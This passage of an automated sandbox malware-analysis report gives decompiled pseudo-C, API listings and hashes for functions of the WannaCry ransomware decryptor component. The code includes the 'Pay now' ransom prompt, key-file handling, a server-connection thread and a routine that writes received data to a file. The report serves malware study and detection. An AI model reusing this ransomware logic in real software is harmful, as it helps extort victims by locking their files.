                                  0x0040bd8c
                                  0x0040bd94
                                  0x0040bd96
                                  0x0040bd99
                                  0x0040bd9e
                                  0x0040bd9f
                                  0x0040bda8
                                  0x0040bdb1
                                  0x0040bdb5
                                  0x0040bdbb
                                  0x0040bdbf
                                  0x0040bdbf
                                  0x00000000
                                  0x0040bd07
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bc7c
                                  0x0040bc75
                                  0x0040bc77
                                  0x00000000
                                  0x0040bc77
                                  0x0040bb38
                                  0x0040bb38
                                  0x0040bb3d
                                  0x0040bb42
                                  0x0040bb47
                                  0x00000000
                                  0x00000000
                                  0x0040bb47
                                  0x0040bb36
                                  0x0040bdf8
                                  0x0040be03
                                  0x0040be10

                                  APIs
                                  • strtok.MSVCRT ref: 0040BBA9
                                  • strtok.MSVCRT ref: 0040BC22
                                  • #825.MFC42(?,?), ref: 0040BCDD
                                  • GetTickCount.KERNEL32 ref: 0040BCEC
                                  • srand.MSVCRT ref: 0040BCF3
                                  • rand.MSVCRT ref: 0040BD09
                                  • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                  • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                  • #825.MFC42(?,?,?,?), ref: 0040BDED
                                    • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                  • #825.MFC42(?), ref: 0040BE7A
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$strtok$CountSleepTickrandsrand
                                  • String ID:
                                  • API String ID: 1749417438-0
                                  • Opcode ID: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                  • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                  • Opcode Fuzzy Hash: 22053940df912021fb9a6cdb0f17ac6f6ca949f8e593908d0331f463cdce664a
                                  • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}















                                  0x004038f6
                                  0x004038f8
                                  0x004038fd
                                  0x004038fe
                                  0x00403905
                                  0x0040390d
                                  0x00403911
                                  0x0040392c
                                  0x00403931
                                  0x00403948
                                  0x0040394d
                                  0x0040394f
                                  0x00403953
                                  0x00403953
                                  0x0040395c
                                  0x0040396f
                                  0x0040397a
                                  0x00403980
                                  0x0040399a
                                  0x004039b6
                                  0x004039bb
                                  0x004039bd
                                  0x004039bf
                                  0x004039c1
                                  0x004039c3
                                  0x00000000
                                  0x004039c3
                                  0x0040399c
                                  0x004039a1
                                  0x004039a3
                                  0x004039a5
                                  0x004039a7
                                  0x004039c8
                                  0x004039c8
                                  0x004039c8
                                  0x004039a1
                                  0x004039d1
                                  0x004039dc
                                  0x004039dc
                                  0x004039e5
                                  0x004039f1
                                  0x004039fe
                                  0x00403a0a
                                  0x00403a17

                                  APIs
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                  • sprintf.MSVCRT ref: 0040397A
                                  • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                    • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                    • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                    • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                    • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                  Strings
                                  • %08X.dky, xrefs: 00403969
                                  • All your files have been decrypted!, xrefs: 004039C3
                                  • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                  • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                  • API String ID: 139182656-2046724789
                                  • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                  • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}









                                  0x00404090
                                  0x00404092
                                  0x00404097
                                  0x0040409d
                                  0x0040409e
                                  0x004040a5
                                  0x004040a9
                                  0x004040ac
                                  0x004040b0
                                  0x004040b5
                                  0x004040c2
                                  0x004040c6
                                  0x004040ce
                                  0x004040d5
                                  0x004040da
                                  0x004040dd
                                  0x004040e4
                                  0x004040eb
                                  0x004040f0
                                  0x004040f6
                                  0x004040fb
                                  0x004040fe
                                  0x0040410f
                                  0x00404112
                                  0x00404115
                                  0x00404120
                                  0x00404129
                                  0x0040412c
                                  0x00404139
                                  0x00404143

                                  APIs
                                  • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                  • #860.MFC42(00421798), ref: 004040F6
                                  • #858.MFC42(00000000,00421798), ref: 004040FE
                                  • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540CursorLoad$#567#858#860
                                  • String ID: 0ZA
                                  • API String ID: 2440951079-2594568282
                                  • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                  • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                  • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407CB0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00407CB0() {
				char _v8;
				intOrPtr _v16;
				char _v28;
				char _v40;
				void* _v104;
				void* _v168;
				char _v260;
				void* _v264;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t35;

				_push(0xffffffff);
				_push(E00413F77);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_t35 = _t34 - 0xfc;
				E004030E0( &_v260, 0);
				_v8 = 0;
				L00412B72();
				_v8 = 1;
				_t24 =  &_v28;
				_v28 = 0x415c00;
				 *_t35 = _t24;
				_v8 = 5;
				L00412D52();
				_v28 = 0x415bec;
				 *_t35 =  &_v40;
				_v40 = 0x415c00;
				_v8 = 6;
				L00412D52();
				_v40 = 0x415bec;
				_v8 = 2;
				L00412D4C();
				_v8 = 1;
				L00412D3A();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return _t24;
			}














                                  0x00407cb0
                                  0x00407cb2
                                  0x00407cbd
                                  0x00407cbe
                                  0x00407cc5
                                  0x00407cd1
                                  0x00407cda
                                  0x00407ce5
                                  0x00407cea
                                  0x00407cf5
                                  0x00407cfc
                                  0x00407d07
                                  0x00407d12
                                  0x00407d1a
                                  0x00407d26
                                  0x00407d31
                                  0x00407d35
                                  0x00407d47
                                  0x00407d4f
                                  0x00407d5b
                                  0x00407d66
                                  0x00407d6e
                                  0x00407d77
                                  0x00407d7f
                                  0x00407d88
                                  0x00407d93
                                  0x00407d9f
                                  0x00407dac

                                  APIs
                                    • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                    • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  • #2514.MFC42 ref: 00407CE5
                                  • #2414.MFC42 ref: 00407D1A
                                  • #2414.MFC42 ref: 00407D4F
                                  • #616.MFC42 ref: 00407D6E
                                  • #693.MFC42 ref: 00407D7F
                                  • #641.MFC42 ref: 00407D93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#567$#2514#324#616#641#693
                                  • String ID: [A$[A
                                  • API String ID: 3779294304-353784214
                                  • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                  • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                  • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195windowfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				signed int _t76;
				struct HWND__* _t92;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}































                                  0x0040c240
                                  0x0040c248
                                  0x0040c253
                                  0x0040c25a
                                  0x0040c260
                                  0x0040c26c
                                  0x0040c283
                                  0x0040c28e
                                  0x0040c293
                                  0x0040c296
                                  0x0040c29b
                                  0x0040c2a0
                                  0x0040c2c8
                                  0x0040c2d7
                                  0x0040c2e3
                                  0x0040c2e3
                                  0x0040c2ec
                                  0x0040c2ee
                                  0x0040c2f3
                                  0x0040c303
                                  0x0040c307
                                  0x0040c309
                                  0x0040c30e
                                  0x0040c31f
                                  0x0040c330
                                  0x0040c340
                                  0x0040c342
                                  0x0040c347
                                  0x0040c34b
                                  0x0040c350
                                  0x0040c35b
                                  0x0040c35d
                                  0x0040c362
                                  0x0040c366
                                  0x0040c372
                                  0x0040c373
                                  0x0040c378
                                  0x0040c382
                                  0x0040c38f
                                  0x0040c39f
                                  0x0040c3a0
                                  0x0040c3a7
                                  0x0040c3e2
                                  0x0040c3ee
                                  0x0040c3ee
                                  0x0040c3fa
                                  0x0040c402
                                  0x0040c403
                                  0x0040c411
                                  0x0040c417
                                  0x0040c452
                                  0x0040c458
                                  0x0040c45c
                                  0x0040c470
                                  0x0040c472
                                  0x0040c477
                                  0x0040c489
                                  0x0040c48f
                                  0x0040c494
                                  0x0040c497
                                  0x0040c497
                                  0x0040c477
                                  0x0040c45c
                                  0x0040c49e
                                  0x0040c4a9
                                  0x0040c4a9
                                  0x0040c4b3
                                  0x0040c4b6
                                  0x0040c4c1
                                  0x0040c4c5
                                  0x0040c4ca
                                  0x0040c419
                                  0x0040c41b
                                  0x0040c427
                                  0x0040c427
                                  0x0040c431
                                  0x0040c438
                                  0x0040c448
                                  0x0040c448
                                  0x00000000
                                  0x0040c3a9
                                  0x0040c3ab
                                  0x0040c3b7
                                  0x0040c3b7
                                  0x0040c3c1
                                  0x0040c3c8
                                  0x0040c3d8
                                  0x0040c4cc
                                  0x0040c4d7
                                  0x0040c4e4
                                  0x0040c4e4
                                  0x0040c3a7
                                  0x0040c2a2
                                  0x0040c2ab
                                  0x0040c2b6
                                  0x0040c2b6
                                  0x0040c2bc
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                  • fopen.MSVCRT ref: 0040C46B
                                  • fwrite.MSVCRT ref: 0040C489
                                  • fclose.MSVCRT ref: 0040C48F
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823fclosefopenfwrite
                                  • String ID:
                                  • API String ID: 1132507536-0
                                  • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                  • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                  • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowtimethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E00401140() {
				intOrPtr _v4;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
				}
				return 1;
			}








                                  0x00401143
                                  0x00401145
                                  0x00401160
                                  0x00401162
                                  0x00401175
                                  0x00401177
                                  0x00401178
                                  0x00401184
                                  0x0040118d
                                  0x00401194
                                  0x004011a9
                                  0x004011b3
                                  0x004011c1
                                  0x004011d7
                                  0x004011d7
                                  0x004011e5

                                  APIs
                                  • #4710.MFC42 ref: 00401145
                                  • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                  • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                  • #537.MFC42(Connecting to server...), ref: 0040118D
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                  • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                  Strings
                                  • Connecting to server..., xrefs: 00401188
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                  • String ID: Connecting to server...
                                  • API String ID: 3305248171-1849848738
                                  • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                  • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                  • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48clipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}










                                  0x00407c32
                                  0x00407c38
                                  0x00407c40
                                  0x00407cab
                                  0x00407c42
                                  0x00407c55
                                  0x00407c59
                                  0x00407c66
                                  0x00407c6c
                                  0x00407c79
                                  0x00407c7f
                                  0x00407c86
                                  0x00407c89
                                  0x00407c90
                                  0x00407c92
                                  0x00407c9b
                                  0x00000000
                                  0x00407ca8
                                  0x00407c63
                                  0x00407c63

                                  APIs
